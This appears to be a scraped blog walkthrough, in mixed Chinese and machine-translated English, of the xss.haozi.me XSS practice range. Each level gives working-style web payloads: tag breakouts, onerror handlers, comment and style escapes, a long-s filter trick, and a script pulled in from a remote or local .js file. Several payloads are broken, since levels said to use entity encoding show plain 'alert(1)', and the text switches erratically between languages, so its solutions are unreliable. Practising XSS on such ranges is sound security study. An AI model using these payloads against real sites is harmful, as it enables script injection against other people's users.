当前位置:网站首页>XSS range intermediate bypass
XSS range intermediate bypass
2022-08-01 19:32:00 【You're still there when you come back from the army】
XSSRange intermediate bypass resolution
靶场环境—https://xss.haozi.me/
第一关:
divBlocks are ordinary elements,直接写入< script >标签即可.
<script>alert(1)</script>或者<img src=1 onerror=alert(1)>或者<svg/onload=alert(1)>

第二关:
逃脱< textarea>标签,直接闭合.
</textarea><script>alert(1)</script></textarea>

第三关:
escape the double quotes,闭合input.
a"><script>alert(1)</script>

第四关:
Parentheses are already filtered,所以利用mtml实体编码,编译成().
<img src=1 onerror="alert(1)">

第五关:
过滤了括号,反引号,尖括号,还是利用html实体编码.
<img src=1 onerror="alert(1)">

第六关:
Transform into a smiley face,利用注释符,直接闭合.
--!><script>alert(1)</script><!--

第七关:
换行,然后进行过滤
type = "image" src=1 onerror
=alert(1)

第八关:
Backslashes are filtered,尖括号,标签不生效.img标签可以执行,But can't complete tags,htmlwill miss.
<img src ="1" onerror="alert(1)"

第九关:
输出在< style>里面,Only text can appear,不能写js ,闭合< style>也不行.Close with a newline.
</style
><script>alert(1)</script>

第十关:
以https://www.segmentfault.com开头,将script标签闭合.
https://www.segmentfault.com"></script><script>alert(1)//

第十一关:
还是以https://www.segmentfault.com"开头.利用重定向,新建一个txrt文件,写入alert(1).
https://[email protected]/txrt.js
第十二关:
Convert all letters to uppercase.利用实体编码,Convert all letters to 16进制.
<img src=1 onerror=" alert(1)">

第十三关:
Converted to uppercase and filteredscript标签.
<img src=1 onerror=" alert(1)">

第十四关:
Annotated everything,Still using annotations.
alert(1)
-->

第十五关:
利用是“s”可以转化为“ſ”.
<ſcript src = "http://127.0.0.1/txrt.js"</script>或者
<ſvg/onload=alert(1)>

第十六关:
Convert content to entity encoding,But it works.html认识.
aa');alert(1)//

边栏推荐
- 【服务器数据恢复】服务器Raid5阵列mdisk组中多块磁盘离线的数据恢复案例
- When installing the GBase 8c database, the error message "Resource: gbase8c already in use" is displayed. How to deal with this?
- 随时随地写代码--基于Code-server部署自己的云开发环境
- nacos安装与配置
- How to record and analyze your alchemy process - use notes of the visual artifact Wandb [1]
- ClassID的计算中,&表示啥意思
- 数值矩阵的图形表示
- The solution to the vtk volume rendering code error (the code can run in vtk7, 8, 9), and the VTK dataset website
- Win11如何删除升级包?Win11删除升级包的方法
- odoo coding conventions (programming conventions, coding guidelines)
猜你喜欢

17、负载均衡

OSPO 五阶段成熟度模型解析

Mobile Zero of Likou Brush Questions

Library website construction source code sharing

升哲科技携全域数字化方案亮相2022全球数字经济大会

通配符 SSL/TLS 证书

【蓝桥杯选拔赛真题47】Scratch潜艇游戏 少儿编程scratch蓝桥杯选拔赛真题讲解

Combining two ordered arrays

Win11如何开启剪贴板自动复制?Win11开启剪贴板自动复制的方法
![[Kapok] #Summer Challenge# Hongmeng mini game project - Sudoku (3)](/img/8d/4f5f7c2463b781cba1c68370d3c29c.png)
[Kapok] #Summer Challenge# Hongmeng mini game project - Sudoku (3)
随机推荐
Screen: GFF, OGS, Oncell, Incell of full lamination process
Multi-Party Threshold Private Set Intersection with Sublinear Communication-2021:解读
MLX90640 Infrared Thermal Imager Temperature Measurement Module Development Notes (Complete)
重保特辑|筑牢第一道防线,云防火墙攻防演练最佳实践
datax - 艰难debug路
Redis启动时提示Creating Server TCP listening socket *:6379: bind: No error
安装GBase 8c数据库的时候,报错显示“Resource:gbase8c already in use”,这怎么处理呢?
数据库系统原理与应用教程(072)—— MySQL 练习题:操作题 121-130(十六):综合练习
数据库系统原理与应用教程(071)—— MySQL 练习题:操作题 110-120(十五):综合练习
kubernetes-部署nfs存储类
Website construction process
部署zabbix
锐捷交换机基础配置
腾讯云主机安全 x 轻量应用服务器|强强联合主机安全普惠版重磅发布
#yyds dry goods inventory# Interview must brush TOP101: the last k nodes in the linked list
PanGu-Coder:函数级的代码生成模型
Heavy cover special | build the first line of defense, cloud firewall offensive and defensive drills best practices
MySQL开发技巧——并发控制
数据库系统原理与应用教程(070)—— MySQL 练习题:操作题 101-109(十四):查询条件练习
【服务器数据恢复】服务器Raid5阵列mdisk组中多块磁盘离线的数据恢复案例